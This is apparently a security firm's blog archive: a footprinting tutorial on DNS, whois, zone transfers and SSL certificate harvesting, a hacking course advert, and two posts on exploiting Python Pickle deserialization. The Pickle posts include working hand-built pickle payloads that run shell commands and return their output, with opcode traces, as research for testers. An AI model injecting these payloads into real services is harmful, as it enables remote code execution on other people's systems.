Fri, 9 Mar 2012

Foot printing – Finding your target...

We were asked to contribute an article to PenTest magazine, and chose to write up an introductory how-to on footprinting. We've republished it here for those interested.

Network foot printing is, perhaps, the first active step in the reconnaissance phase of an external network security engagement. This phase is often highly automated with little human interaction as the techniques appear, at first glance, to be easily applied in a general fashion across a broad range of targets. As a security analyst, footprinting is also one of the most enjoyable parts of my job as I attempt to outperform the automatons; it is all about finding that one target that everybody forgot about or did not even know they had, that one old IIS 5 webserver that is not used, but not powered off.

With this article I am going to share some of the steps, tips and tricks that pentesters and hackers alike use when starting on an engagement.

Approach

As with most things in life, a good approach to a problem yields better results, and over time, as your approach is refined, you will spend less time while getting better results. By following a methodology, your footprinting will become more repeatable and thus more reliable. A basic footprinting methodology covers reconnaissance, DNS mining, various information services (e.g. whois, Robtex, routes), network registration information and active steps such as SSL host enumeration.

While the temptation exists to merely feed a domain name into a tool or script and take the output as your completed footprint, this will not yield a passable footprint for two reasons. Firstly, a single tool will not have access to all the disparate information sources that one should consult, and secondly the footprinting process is inherently iterative and continuous. A footprint is almost never complete; instead, a fork of the footprint data provides the best current view of the target, but the information could change tomorrow as new sites are brought online, or old sites are taken offline. As a new piece of data is found that could expand the footprint, a new iteration of the footprinting process triggers with that datum as the seed, and the results are combined with all discovered information.
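The iterative process described above can be sketched as a simple worklist loop. This is only an illustration: the `discover` callback is a hypothetical stand-in for whatever lookups (DNS, whois, search engines) you run against a single datum, and is not part of any particular tool.

```python
from collections import deque


def iterate_footprint(seeds, discover):
    """Keep expanding the footprint until no new items turn up.

    `discover` is a hypothetical callback: given one item (a domain,
    hostname or address) it returns an iterable of related items.
    """
    seeds = list(seeds)
    seen = set(seeds)
    queue = deque(seeds)
    while queue:
        item = queue.popleft()
        for found in discover(item):
            # Every new datum becomes the seed of another iteration.
            if found not in seen:
                seen.add(found)
                queue.append(found)
    return seen
```

Because already-seen items are skipped, the loop terminates even when two sources point at each other; rerunning it later with the same seeds gives a fresh view of the target.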

Know your target

The very first thing to do is to get to know your target organisation: what they do, who they do it for, who does it for them, where they do it from (both online and in the kinetic world), and what community or charity work they are involved in. This will give you an insight into what type of network/infrastructure you can expect. Reading public announcements, financial reports and any other documents published on or by the organisation might also yield interesting results. Any organisation that must publish regular reports (e.g. listed companies) provides a treasure trove of information for understanding the target's core business units, corporate hierarchy and lines of business. All these become very useful when selecting targets.

Dumpster diving, if you are up for it and have physical access to the target, means sifting through trash to get useful information, but in recent times social media can provide us with even more. Sites like LinkedIn, Facebook and Twitter can provide you with lists of employees and projects that the organisation is involved with and perhaps even information about third party products and suppliers that are in use.

One should also keep an eye out for evidence of previous breaches or loss of credentials. It has become commonplace for hackers to post information about security breaches on sites like pastebin.com. The most likely evidence would be credentials in the form of corporate emails and passwords being reused on unrelated sites that are hacked and have their user databases uploaded. In addition, developers use sites like Pastebin to share code, ideas and patches, and if you are lucky you might just find a little snippet of code sitting out in the open on Pastebin that will give you the edge.

DNS

“The Domain Name System (DNS) is a hierarchical distributed naming system for computers, services, or any resource connected to the Internet or a private network.” — WikiPedia

In a nutshell, DNS is used to convert computer names to their numeric addresses.

Start by enumerating every possible domain owned by the target. This is where the information from the initial reconnaissance phase comes in handy, as the target's website will likely point to external domains of interest and also help you guess at possible names. With a list of discovered domains in hand, move on to a TLD (top-level domain) expansion. TLDs are the highest level subdomains in DNS; .com, .net, .za, .mobi are all examples of TLDs (The Mozilla Organization maintains a list of TLDs https://wiki.mozilla.org/TLD_List).

In the next step, we take a discovered domain and check to see if there are any other domains with the same name, but with a different TLD. For example, if the target has the domain victim.com, test whether the domains victim.net, victim.info, victim.org etc. exist and, if they do, check whether they are owned by our target organization. To determine whether a domain exists or not, one should examine the SOA (start of authority) DNS record for the domain. Commands like nslookup under Microsoft Windows or dig/host under most of the *nix family will reveal SOA records.
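Generating the candidate names for a TLD expansion is easy to script. The sketch below is a minimal illustration, assuming a simple two-label domain such as victim.com (it does not handle names like victim.co.za); the function name and the TLD list are made up for the example, and checking SOA and whois for each candidate is left to the tools described in this article.

```python
def tld_expand(domain, tlds):
    """Return the same name under every other TLD in `tlds`.

    Assumes a plain "name.tld" domain; the part after the first dot
    is treated as the current TLD and skipped.
    """
    name, _, current = domain.partition(".")
    return [f"{name}.{tld}" for tld in tlds if tld != current]


# Each candidate would then be fed to something like "dig <candidate> soa".
candidates = tld_expand("victim.com", ["com", "net", "info", "org"])
```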

Using dig, “dig zonetransfer.me soa”.

Figure 1: Using dig to get the SOA (Start of authority) record for a domain

If, by verifying the SOA, it is confirmed that the domain exists, then the next step is to track down who it belongs to. At this point the whois service is called upon. “Whois” is simply a registry that contains the details of the owner of a domain. Note that it is not entirely reliable and certainly not consistent. The following very simple query, “whois zonetransfer.me”, provides us with the details of the owner of the domain “zonetransfer.me”.

Figure 2: Using whois to get the domain owner detail

After finding domains, running them through a TLD expansion and verifying their whois information, it is time to track down hosts. First we need to get the NS or name server records for the domains. Again using “dig zonetransfer.me ns” returns a list of all the name servers used by this domain. In many cases the name server will not be part of the target's network and is often out-of-scope, but they will still be used in the next step.

DNS yields much interesting information, but the default methods for extracting information from foreign servers effectively rely on brute force. However, DNS supports a trick where all DNS information for a zone can be downloaded if the server allows it; this is called a “zone transfer”. When enabled, zone transfers are extremely useful as they negate the need for guessing or brute-forcing; sadly they are commonly disabled. Still, given their usefulness, it is always worth testing for them. Zone transfers should be attempted against all the name servers specified in the NS records of a domain: the data contained in each name server should be the same, but the security configuration might be different. Using dig, the following command will attempt to perform a zone transfer: “dig axfr @ns12.zoneedit.com zonetransfer.me”

Figure 3: Performing a zone transfer using dig

As mentioned previously, zone transfers are not that common. When we cannot download the zone file, there are a couple of other tricks that might work. One is to brute force or guess host names: by using a long list of common hostnames one can test for names such as “fw.victim.com”, “intranet.victim.com”, “mail.victim.com” and so on. The names can be commonly seen hostnames, generated names when computers are assigned numeric or algorithmic names, or from sets of related names such as characters from a book series. When brute forcing DNS, be sure to check the following DNS records: CNAME, A and AAAA. Again this is easy using a tool like dig. “dig www.google.com a” produces the DNS configuration for www.google.com, note that the hostname www.google.com actually has multiple DNS entries, one CNAME record, and multiple A records. Looking at the IP addresses it is clear that there are several different hosts (2 in the screenshot below).
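As a rough sketch of the brute-force idea, the snippet below builds candidate names from a word list and keeps those that resolve. It uses Python's standard `socket.gethostbyname_ex`, which only returns IPv4 addresses, so AAAA and raw CNAME records would need a proper DNS library. The function names and the word list are assumptions made for the example.

```python
import socket


def candidate_hosts(domain, words):
    """Prefix each guessed word onto the domain."""
    return [f"{word}.{domain}" for word in words]


def resolve_all(hostnames, resolver=socket.gethostbyname_ex):
    """Return {hostname: [addresses]} for every name that resolves.

    `resolver` defaults to the system resolver and can be swapped
    out, for example for offline testing.
    """
    found = {}
    for name in hostnames:
        try:
            _canonical, _aliases, addresses = resolver(name)
        except OSError:
            # socket.gaierror (a subclass of OSError) means no such host.
            continue
        found[name] = addresses
    return found
```

Calling `resolve_all(candidate_hosts("victim.com", ["fw", "intranet", "mail"]))` would perform three live lookups; for long word lists a dedicated tool will be considerably faster.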

Figure 4: Using dig to get the a record for a host entry

Doing this manually seems easy and quick (and it is), but if we want to brute force or guess many host names, it will take too long. Of course, it is easy enough to script these commands to automate the process; however, there are existing tools written specifically for this purpose. One of the most popular tools, Fierce, is a Perl script written by RSnake (http://ha.ckers.org/fierce/), which is easy to use and has many useful functions. Additionally, there are tools like Paterva's Maltego and SensePost's Yeti (a tool I wrote) which provide graphical tools for this purpose.

If we happen to have a list of IP addresses or IP netblocks of the target, then a further DNS trick is to convert the addresses into hostnames using reverse lookups to get the PTR record entry. This is useful since reverse records are easily brute forced in IPv4. Bear in mind that DNS does not require a PTR record (reverse entry), nor does it require that entries in the reverse zone match entries in the forward zone. Still, the result can give you an idea of whether the host is a shared host, owned and hosted by the company, or just remotely hosted.

To test once more, try using dig, “dig 104.66.194.173.in-addr.arpa ptr”. While this too can be easily automated, the previously mentioned tools will also handle PTR records.
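The reverse-lookup name in the dig command above is just the address with its octets reversed and “.in-addr.arpa” appended. A small sketch using Python's standard `ipaddress` module shows how these names could be generated for a whole netblock; the helper names are made up for the example, and the names still have to be queried with dig or a similar tool.

```python
import ipaddress


def ptr_name(ip):
    """Return the reverse-zone name to query for an address."""
    return ipaddress.ip_address(ip).reverse_pointer


def ptr_names_for_block(cidr):
    """Return the reverse-zone name for every address in a netblock."""
    return [addr.reverse_pointer for addr in ipaddress.ip_network(cidr)]


# The address behind the dig example above.
example = ptr_name("173.194.66.104")
```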

Search engines:

DNS interrogation and mining form the bulk of footprinting, but thanks to modern search engines like Google and Bing, finding targets has become much easier.

Apart from the normal searching for your target, as you would do in your initial phase, you can actually use the data that you discovered during the course of the DNS mining to try and get further information using search engines. Bing from Microsoft provides us with two really useful search operators: “ip:” and “site:”. When using the “ip:” operator, Bing will return a list of hosts that it has indexed that resolve to the IP address that you have specified. Alternatively the “site:” operator when used with a domain name, will return a list of host names that have been indexed by the search engine and belong to the domain specified. Quick and easy, and Bing also provides you with a very simple free API that you can use to automate these searches.

Address mapping

All this fuss with DNS is important, but it is only useful insofar as it leads us to addresses. The next step is discovering where the target exists within the IP address space. Luckily, useful tools and resources exist to help us uncover these ranges by automating a combination of manual techniques such as whois querying, traceroute and netblock calculators. In the previous section the whois tool was used to get the domain owner information. The same tool can be used to discover the ownership/assignment details of a specific IP address. Let's take www.facebook.com; one of the IP addresses that it resolves to is 69.63.190.10. “whois 69.63.190.10” produces the following output.

Figure 5: Getting the netblock and owner using whois

From the whois output we get really useful information. First is a netblock range, 69.63.176.0-69.63.190.255, as well as the owner of this netblock, namely Facebook, Inc. In this case we are lucky and the netblock is registered to Facebook, but often you will only get the network service provider to which the netblock is allocated. In that case, you will have to query the service provider in order to gain more information about the specific netblock. Online resources can also be very useful; for example, ARIN (American Registry for Internet Numbers) and the other regional registries (RIPE, AfriNIC, APNIC and LACNIC) provide a reverse whois search interface where one can search for organisation names and other terms, even performing wildcard searches. Giving Facebook a second look, we try a search on the reverse whois interface found at http://whois.arin.net/ with the term “facebook”, and get a list of five additional network ranges.
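Whois reports the netblock as a start and end address, while most scanning tools expect CIDR notation. As a small illustration of what a netblock calculator does, the sketch below converts the range quoted above using Python's standard `ipaddress` module; the helper name is an assumption for the example.

```python
import ipaddress


def range_to_cidrs(first, last):
    """Convert a start-end address range into the covering CIDR blocks."""
    start = ipaddress.ip_address(first)
    end = ipaddress.ip_address(last)
    return [str(net) for net in ipaddress.summarize_address_range(start, end)]


# The range from the whois output discussed above.
cidrs = range_to_cidrs("69.63.176.0", "69.63.190.255")
# cidrs == ['69.63.176.0/21', '69.63.184.0/22', '69.63.188.0/23', '69.63.190.0/24']
```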

Figure 6: Search results for ARIN reverse whois

SSL Certificates

Lastly, we turn to SSL. SSL may be more familiar as a “protection” against nasty eavesdroppers and men-in-the-middle, but it is also useful for footprinters. How? It is really simple: one of the security checks performed by browsers when deciding on the validity of an SSL certificate is whether the Common Name contained in the certificate matches the DNS name of the host requested from the browser. How does this help? Say a list of IP addresses has been produced; the next step would be to perform a reverse lookup of all these addresses. However, if no reverse entry is present and Bing has no record of the IP, then some creativity is called for. If an HTTPS website is hosted on that address, simply browse to that IP address and, when presented with the invalid certificate error message, look for the “real” host name.

Figure 7: Firefox reporting the common name contained in a SSL certificate for a host

Again, this is something that is easily automated, so we have included a module in Yeti to actually do this for you.
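For readers who would rather script this than use Yeti, here is a hedged sketch using Python's standard `ssl` module; it is not how Yeti does it. The helper names are assumptions. One caveat matters: `getpeercert()` only returns a populated dict when the certificate chain itself validates, so this sketch disables only the host name check and will fail on self-signed or expired certificates, which would need the binary certificate decoded instead.

```python
import socket
import ssl


def fetch_cert(ip, port=443, timeout=5):
    """Connect to an address and return the parsed certificate dict.

    Host name checking is disabled (we connect by IP on purpose),
    but the chain is still verified.
    """
    context = ssl.create_default_context()
    context.check_hostname = False
    with socket.create_connection((ip, port), timeout=timeout) as sock:
        with context.wrap_socket(sock) as tls:
            return tls.getpeercert()


def names_from_cert(cert):
    """Pull the Common Name and DNS alternative names out of a cert dict."""
    names = []
    for rdn in cert.get("subject", ()):
        for key, value in rdn:
            if key == "commonName":
                names.append(value)
    for kind, value in cert.get("subjectAltName", ()):
        if kind == "DNS" and value not in names:
            names.append(value)
    return names
```

`names_from_cert(fetch_cert("<address>"))` would then list the host names the certificate was issued for.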

Conclusion

Foot printing might at first glance appear to be simple and mundane, but the more you do it, the more you will realise that very few organisations have a handle on exactly what they have and what they present to the Internet. As the Internet and networks evolve so will the way companies and organisations use it, and so will their footprint. A year-old footprint could be hopelessly outdated, and ongoing footprinting helps organisations maintain a current view of their threat landscape.

With the ongoing move away from local infrastructure to hosted infrastructure, the footprint expands, spreads and grows, and so will our quest to find as much as possible.

Fri, 27 May 2011

Hacking by Numbers: BlackOps Edition

The brand new BlackOps HBN course makes its debut in Vegas this year. The course finds its place as a natural follow on from Bootcamp, and prepares students for the more intense Combat edition. Where Bootcamp focuses on methodology and Combat focuses on thinking, BlackOps covers tools and techniques to brush up your skills.

This course is split into eight segments, covering scripting, targeting, compromise, privilege escalation, pivoting, exfiltration, client-side and even a little exploit writing. BlackOps is different from our other courses in that it is pretty full of tricks, which are needed to move from the methodology of hacking to professional-level pentesting. It's likely to put a little (more) hair on your chest.

Course Name: Hacking By Numbers: BlackOps Edition
Venue: BlackHat Briefings, Caesars Palace Las Vegas, NV
Dates: July 30-31 & August 1-2 2011
Sign up here.

Thu, 24 Feb 2011

Playing with Python Pickle #3

[This is the third in a series of posts on Pickle. Link to part one and two.]

Thanks for stopping by. This is the third posting on the bowels of Python Pickle, and it's going to get a little more complicated before it gets easier. In the previous two entries I introduced Pickle as an attack vector present in many memcached instances, and documented tricks for executing OS commands across Python versions as well as a mechanism for generically calling class instance methods from within the Pickle VM.

In this post we'll look at executing pure Python code from within a Pickle stream. While running os.system() or one of its cousins is almost always a necessity, having access to a Python interpreter means that your exploits can be that much more efficient (no shell syntax to worry about, slightly more portable exploits). I imagine one would tend to combine the pure Python with os.system() calls.

Normal execution of pure Python

Dynamic Python execution is normally achieved through the 'exec' statement. However, since 'exec' is a Python statement and not a class method, the depickler knows nothing about 'exec'. __builtin__.eval() on the other hand is a method that the depickler can call; however eval() normally takes an expression only. Thus,

eval("import os; os.system('ls')")

fails. It's worth noting that one can still call methods in expressions, so

eval("os.system('ls')")

can work if the 'os' module is present in the environment. If it isn't, you can still import 'os' with the expression:

eval("__import__('os').system('ls')")

or even execute a full code block with a double eval():

eval('eval(compile("import os;os.system(\\"ls\\")","q","exec"))')

Moral of that story: don't ever eval() untrusted input. Obviously.

However, we want to execute not only expressions but full Python scripts. eval() will also accept a code object, which is produced by compile(), and compile() will accept a full Python script. For example, to prove execution here's the venerable timed wait:

cmd = "import os; f=os.popen('sleep 10'); f.read()"
c = compile(cmd,"foo","exec")
eval(c)

Reaching into eval'ed code

Continuing with eval(), we try a similar example except we execute 'ls' instead of sleep (and do it in one line of Python). There's an important distinction here, and that is the return value of eval; notice how 'ls' returns nothing:

>>> ret=eval(compile("import os; f=os.popen('ls'); f.read()","foo","exec"))
>>> print ret
None

This is because eval() always returns "None" if the supplied code object was compiled with "exec", which means we need a different trick for extracting the contents of the eval'ed script. Luckily our first idea worked (yay), so we didn't look further; there may be better/faster/easier options. That idea was to modify the script's globals (variables scoped for the entire script) inside the eval() call, and access those globals outside the eval() call. This works because globals are passed into eval() and changes are reflected after the call returns:

>>> print smashed
Traceback (most recent call last):
  File "<stdin>", line 1, in <module>
NameError: name 'smashed' is not defined
>>> eval(compile("import os; f=os.popen('ls'); smashed=f.read()","foo","exec"))
>>> print smashed
Desktop
Documents
Downloads
Library
Movies
Music
...
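The session above is Python 2. As a minimal sketch of the same two observations under Python 3, the snippet below uses a harmless assignment instead of os.popen and passes an explicit dict as the globals so the effect is easy to inspect. The helper name and the toy script are assumptions for the example.

```python
def run_and_extract(source, name):
    """Run a script via eval(compile(...)) and fish a global back out.

    Returns (return value of eval, value of the named global).
    """
    env = {}
    code = compile(source, "foo", "exec")
    # eval() of a code object compiled in "exec" mode returns None ...
    ret = eval(code, env)
    # ... but assignments made by the script are left behind in env.
    return ret, env.get(name)


ret, smashed = run_and_extract("smashed = 6 * 7", "smashed")
```

Here `ret` is None while `smashed` carries the value computed inside the eval'ed script, which is the same channel the Pickle streams in this post rely on.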

Converting to Pickle

In the example above, the global "smashed" is created inside eval(), and carried into the outer environment. It is quite easy to convert the eval(compile()) pattern into a Pickle:

c__builtin__
eval
(c__builtin__
compile
(S'import os\\np=os.popen("ls -al")\\nsmashed=p.read()\\n'
S""
S"exec"
tRc__builtin__
globals
)RtRc__builtin__
globals
)R.

This executes 'ls -al', stores the output in the "smashed" global variable and returns the whole globals dict as the end result of depickling. However, it is messy; globals contains other entries, which wastes space and makes the output harder to read. If we're inserting this into a broader pickle, we'd like to have more control (i.e. return a single string) rather than hope that whatever object we are injecting into can handle a dict.

Final exercise

Pickle does not appear to have a way of referencing dict entries (i.e. globals()['smashed'] in Python), so again we have to dig into the docs. The dict builtin supports a "get" method, but requires a class instance... which should sound a little familiar if you still recall the trick from the last post on reading output from os.popen. In Python terms what we're doing is:

code=compile("import os; f=os.popen('ls'); smashed=f.read()","foo","exec")
eval(code)
__builtin__.apply(__builtin__.getattr(__builtin__.dict,"get"),(__builtin__.globals(),"smashed"))

Converted into Pickle we get:

c__builtin__
eval
(c__builtin__
compile
(S'import os\\np=os.popen("ls -al")\\nsmashed=p.read()\\n'
S""
S"exec"
tRc__builtin__
globals
)RtR0(c__builtin__
globals
)RS"smashed"
tp0
0c__builtin__
getattr
(c__builtin__
dict
S"get"
tRp1
0c__builtin__
apply
(g1
g0
tR.

The execution trace of this Pickle stream is:

  1. 'c' -> find the callable "__builtin__.eval", push it onto the stack [SB] [__builtin__.eval]
  2. '(' -> push a MARK onto the stack [SB] [__builtin__.eval] [MARK]
  3. 'c' -> find the callable "__builtin__.compile", push it onto the stack [SB] [__builtin__.eval] [MARK] [__builtin__.compile]
  4. '(' -> push a MARK onto the stack [SB] [__builtin__.eval] [MARK] [__builtin__.compile] [MARK]
  5. "S'import os\\np=os.popen("ls -al")\\nsmashed=p.read()\\n'" -> push 'import os\\np=os.popen("ls -al")\\nsmashed=p.read()\\n' onto the stack [SB] [__builtin__.eval] [MARK] [__builtin__.compile] [MARK] ['import os\\np=os.popen("ls -al")\\nsmashed=p.read()\\n']
  6. "S''" -> push '' onto the stack [SB] [__builtin__.eval] [MARK] [__builtin__.compile] [MARK] ['import os\\np=os.popen("ls -al")\\nsmashed=p.read()\\n'] ['']
  7. "S'exec'" -> push 'exec' onto the stack [SB] [__builtin__.eval] [MARK] [__builtin__.compile] [MARK] ['import os\\np=os.popen("ls -al")\\nsmashed=p.read()\\n'] [''] ['exec']
  8. 't' -> pop 'import os\\np=os.popen("ls -al")\\nsmashed=p.read()\\n','','exec' and MARK, push ('import os\\np=os.popen("ls -al")\\nsmashed=p.read()\\n','','exec') [SB] [__builtin__.eval] [MARK] [__builtin__.compile] [('import os\\np=os.popen("ls -al")\\nsmashed=p.read()\\n','','exec')]
  9. 'R' -> pop "__builtin__.compile" and "('import os\\np=os.popen("ls -al")\\nsmashed=p.read()\\n','','exec')", call __builtin__.compile('import os\\np=os.popen("ls -al")\\nsmashed=p.read()\\n','','exec'), push the code object onto the stack [SB] [__builtin__.eval] [MARK] [code_object]
  10. 'c' -> find the callable "__builtin__.globals", push it onto the stack [SB] [__builtin__.eval] [MARK] [code_object] [__builtin__.globals]
  11. ')' -> push an empty tuple onto the stack [SB] [__builtin__.eval] [MARK] [code_object] [__builtin__.globals] [()]
  12. 'R' -> pop "__builtin__.globals" and "()", call __builtin__.globals(), push the dict onto the stack [SB] [__builtin__.eval] [MARK] [code_object] [<globals dict>]
  13. 't' -> pop code_object, <globals dict> and MARK, push (code_object, <globals dict>) [SB] [__builtin__.eval] [(code_object, <globals dict>)]
  14. 'R' -> pop "__builtin__.eval" and "(code_object, <globals dict>)", call __builtin__.eval(code_object, <globals dict>), push the None onto the stack [SB] [None]
  15. '0' -> pop None from the stack [SB]
  16. '(' -> push a MARK onto the stack [SB] [MARK]
  17. 'c' -> find the callable "__builtin__.globals", push it onto the stack [SB] [MARK] [__builtin__.globals]
  18. ')' -> push an empty tuple onto the stack [SB] [MARK] [__builtin__.globals] [()]
  19. 'R' -> pop "__builtin__.globals" and "()", call __builtin__.globals(), push the dict onto the stack [SB] [MARK] [<globals dict>]
  20. "S'smashed'" -> push 'smashed' onto the stack [SB] [MARK] [<globals dict>] ['smashed']
  21. 't' -> pop <globals dict>, 'smashed' and MARK, push (<globals dict>, 'smashed') [SB] [(<globals dict>,'smashed')]
  22. 'p0' -> store (<globals dict>, 'smashed') in register 0 [SB] [(<globals dict>,'smashed')]
  23. '0' -> pop (<globals dict>, 'smashed') from the stack [SB]
  24. 'c' -> find the callable "__builtin__.getattr", push it onto the stack [SB] [__builtin__.getattr]
  25. '(' -> push a MARK onto the stack [SB] [__builtin__.getattr] [MARK]
  26. 'c' -> find the callable "__builtin__.dict", push it onto the stack [SB] [__builtin__.getattr] [MARK] [__builtin__.dict]
  27. "S'get'" -> push 'get' onto the stack [SB] [__builtin__.getattr] [MARK] [__builtin__.dict] ['get']
  28. 't' -> pop __builtin__.dict,'get' and MARK, push (__builtin__.dict,'get') [SB] [__builtin__.getattr] [(__builtin__.dict,'get')]
  29. 'R' -> pop "__builtin__.getattr" and "(__builtin__.dict,'get')", call __builtin__.getattr(__builtin__.dict,'get'), push the attribute onto the stack [SB] [dict.get]
  30. 'p1' -> store dict.get in register 1 [SB] [dict.get]
  31. '0' -> pop dict.get from the stack [SB]
  32. 'c' -> find the callable "__builtin__.apply", push it onto the stack [SB] [__builtin__.apply]
  33. '(' -> push a MARK onto the stack [SB] [__builtin__.apply] [MARK]
  34. 'g1' -> push dict.get from register 1 [SB] [__builtin__.apply] [MARK] [dict.get]
  35. 'g0' -> push (<globals dict>, 'smashed') from register 0 [SB] [__builtin__.apply] [MARK] [dict.get] [(<globals dict>, 'smashed')]
  36. 't' -> pop dict.get,(<globals dict>, 'smashed') and MARK, push (dict.get,(<globals dict>, 'smashed')) [SB] [__builtin__.apply] [(dict.get,(<globals dict>, 'smashed'))]
  37. 'R' -> pop "__builtin__.apply" and "(dict.get,(<globals dict>, 'smashed'))", call __builtin__.apply(dict.get,(<globals dict>, 'smashed')), push the "smashed" value onto the stack [SB] ["Desktop\nDocuments\nDownloads\n..."]
  38. '.' -> pop and return value of "smashed", exit [SB]
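The second half of that trace (steps 16 to 38) can be tried safely under Python 3 with a toy dict in place of globals(). This is a sketch under stated assumptions rather than a port of the exploit: `apply()` no longer exists in Python 3, so the stream calls dict.get directly with the 'R' opcode, the module is named `builtins` rather than `__builtin__`, and the dict is built in the stream itself with the 'd' (DICT) opcode.

```python
import pickle

stream = b"".join([
    b"((S'smashed'\nS'ls output'\nd",  # MARK, MARK, key, value, build dict
    b"S'smashed'\nt",                   # push the key, tuple up to the MARK
    b"p0\n0",                           # store (dict, key) in memo 0, pop it
    b"cbuiltins\ngetattr\n",            # push builtins.getattr
    b"(cbuiltins\ndict\nS'get'\ntR",    # getattr(dict, 'get') -> dict.get
    b"g0\n",                            # push (dict, key) back from memo 0
    b"R.",                              # call dict.get(dict, key), stop
])

# Only ever unpickle streams you built yourself.
value = pickle.loads(stream)
```

The depickled object is the single string stored under "smashed", not the whole dict, which is the point of the getattr/dict.get detour.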

Ending off

This post demonstrates a few concepts that are of interest to the Pickle hacker. We showed how to construct a Pickle stream such that arbitrary Python was executed during the deserialization process, we mentioned that it was possible to carry information from within an eval() call into the executing environment of the depickler, and finally we revisited the trick for indirectly calling class instance methods in order to return eval()'s value as the depickled object.

In the last posting on this topic, we'll look at tactical uses for all the Pickle hacking we've covered: where to find Pickle objects, where they're processed and how to modify objects in place. Stay tuned.

Mon, 15 Nov 2010

Playing with Python Pickle #2

[This is the second in a series of posts on Pickle. Link to part one.]

In the previous post I introduced Python's Pickle mechanism for serializing and deserializing data and provided a bit of background regarding where we came across serialized data, how the virtual machine works and noted that Python intentionally does not perform security checks when unpickling.

In this post, we'll work through a number of examples that depict exactly why unpickling untrusted data is a dangerous operation. Since we're going to handcraft Pickle streams, it helps to have an opcode reference handy; here are the opcodes we'll use:

  • c<module>\n<function>\n -> push <module>.<function> onto the stack. It's actually more subtle than this but this simplification works for us.
  • ( -> push a MARK object onto the stack.
  • S'<string>'\n -> Push <string> object onto the stack.
  • V'<string>'\n -> Push Unicode <string> object onto the stack.
  • l -> pop everything off the stack up to the topmost MARK object, create a list with the objects (excl MARK) and push the list back onto the stack
  • t -> pop everything off the stack up to the topmost MARK object, create a tuple with the objects (excl MARK) and push the tuple back onto the stack
  • R -> pop two objects off the stack; the top object is treated as an argument and the lower object is a callable (function object). Apply the function to the arguments and push the result back onto the stack
  • p<index>\n -> Peek at the top stack object and store it in memo or register <index>.
  • g<index>\n -> Grab an object from memo or register <index> and push onto the stack.
  • 0 -> Pop and discard the topmost stack item.
  • . -> Terminate the virtual machine. If you're pasting the examples below into larger Pickle streams, make sure to remove the '.'
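To see these opcodes in a real stream, Python's standard `pickletools` module can disassemble one. The sketch below is a Python 3 illustration using a deliberately harmless hand-written stream (it calls `len`, and the module is spelled `builtins` in Python 3); the stream is an assumption for the example, not one from the original post.

```python
import pickle
import pickletools

# c<module>\n<function>\n, MARK, S'<string>'\n, t, R, '.'
stream = b"cbuiltins\nlen\n(S'hello'\ntR."

# List the opcode names in the order the virtual machine sees them.
opcode_names = [op.name for op, arg, pos in pickletools.genops(stream)]

# Running the stream calls len('hello').
result = pickle.loads(stream)
```

`pickletools.dis(stream)` prints the same information as an annotated listing, which is handy when handcrafting longer streams.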

Executing OS commands

In the previous post, the canonical abuse case for unpickling untrusted data was listed:

cos
system
(S'echo hello world'
tR.

Let's step through this (the stack is included after each step, [SB] indicates the stack bottom):

  1. 'c' -> find the callable "os.system", push the callable onto the stack. [SB] [os.system]
  2. '(' -> push a MARK onto the stack [SB] [os.system] [MARK]
  3. "S'echo hello world'" -> push 'echo hello world' onto the stack [SB] [os.system] [MARK] ['echo hello world']
  4. 't' -> pop "echo hello world" and MARK, push the tuple "('echo hello world')" onto the stack [SB] [os.system] [('echo hello world')]
  5. 'R' -> pop "('echo hello world')" and "os.system", call os.system('echo hello world'), push the result back on the stack [SB] [0]
  6. '.' -> pop the result off the stack and terminate [SB], result was '0'
<rat-hole>

Perhaps one instruction that should be clarified is 'c', which loads a class based on the two arguments 'module' and 'class'. Pickle's docs define the behaviour as follows: "The class object module.class is pushed on the stack. More accurately, the object returned by self.find_class(module, class) is pushed on the stack". Our previous simplified definition said that the 'c' instruction loaded function references, and this is the case, however the full explanation shows that more types than function references can be loaded.

For our purposes we want to load classes that are callable, which is a requirement for the 'R' instruction. A callable is an object that has a "__call__" attribute which, if you're also not a Python programmer, means having to search for more information. A non-expert definition is something like: if the module has functions (e.g. os.system()) then these are suitable for 'c'. However, class instance method objects (x=Foo();x.bar()) are not suitable for the 'c' opcode since it cannot handle class instances. It is also worth pointing out that the 'R' opcode doesn't care about what type of object it executes, so long as the object responds to "__call__". The interplay between 'c' and 'R' is important for the approach shown later, since 'c' is quite limited but 'R' can handle more types of objects.

What this rat-hole concludes with is that we have not come across a Pickle example showing how to execute method calls on class instance objects.

</rat-hole>

Let's try to improve on the command execution example; it's cute for executing commands, but if the unpickling happens on an app server then we won't see the output of "os.system()", since it returns the retval of the shell rather than stdout/stderr. Any output of the command is printed to the server's stdout. Thus for our 'echo hello world' example, the unpickling returns '0' even though the command successfully ran.

Our first goal is to retrieve the output of commands in the reconstructed object. Initial ideas focused on manipulating the shell's return value to carry over output:

cos system (S'printf -v a \'%d\' "\'`uname -a | sed \'s/.\\{2\\}\\(.\\).*/\\1/\'`";exit $a;' tR.

This uses a combination of the shell's backtick and printf statements, sed and exit to return one character at a time in the exit status. However this too is messy; if the output changes between invocations this approach is pretty worthless and it's also noisy and low bandwidth.

The next option was "os.popen", however we quickly became bogged down. "os.popen()" returns an instance (e.g. proc=os.popen("echo foo")) and in order to access the output of the command, we'd need to call "proc.read()". However, the pickle instruction set doesn't appear to support calling instance methods directly, as we've already mentioned. The next option was to look for other modules, and the 'subprocess' module did the trick with its 'check_output()' function, which takes an executable and a set of arguments, runs the executable on the arguments and returns the output as a string:

csubprocess
check_output
(S'uname'
tR.

returns

'Darwin\n'

This looks like good news in that we're executing commands and viewing output, however the downsides quickly become apparent. "subprocess.check_output" does not invoke a shell, so we can't simply pass in "uname -a" as a single string, it needs to be broken up into arguments. More importantly though, "check_output" was only added in Python 2.7, so with earlier versions this won't work. We can easily overcome the first of these hurdles; "check_output" will take arguments specified in a list like so:

subprocess.check_output(["uname", "-a"])

We just need to craft the instructions to create a list and leave it on the stack:

csubprocess check_output ((S'uname' S'-a' ltR.

This is identical to the previous example except for the additional MARK instruction '(', the '-a' string argument and the 'l' instruction to build a list from the previous MARK. This is a rough execution trace of the VM on the instruction sequence:

  1. 'c' -> find the callable "subprocess.check_output", push the callable onto the stack. [SB] [subprocess.check_output]
  2. '(' -> push a MARK onto the stack [SB] [subprocess.check_output] [MARK]
  3. '(' -> push a MARK onto the stack [SB] [subprocess.check_output] [MARK] [MARK]
  4. "S'uname'" -> push 'uname' onto the stack [SB] [subprocess.check_output] [MARK] [MARK] ['uname']
  5. "S'-a'" -> push '-a' onto the stack [SB] [subprocess.check_output] [MARK] [MARK] ['uname'] ['-a']
  6. 'l' -> pop "uname", "-a" and MARK, push the list "['uname','-a']" onto the stack [SB] [subprocess.check_output] [MARK] [['uname','-a']]
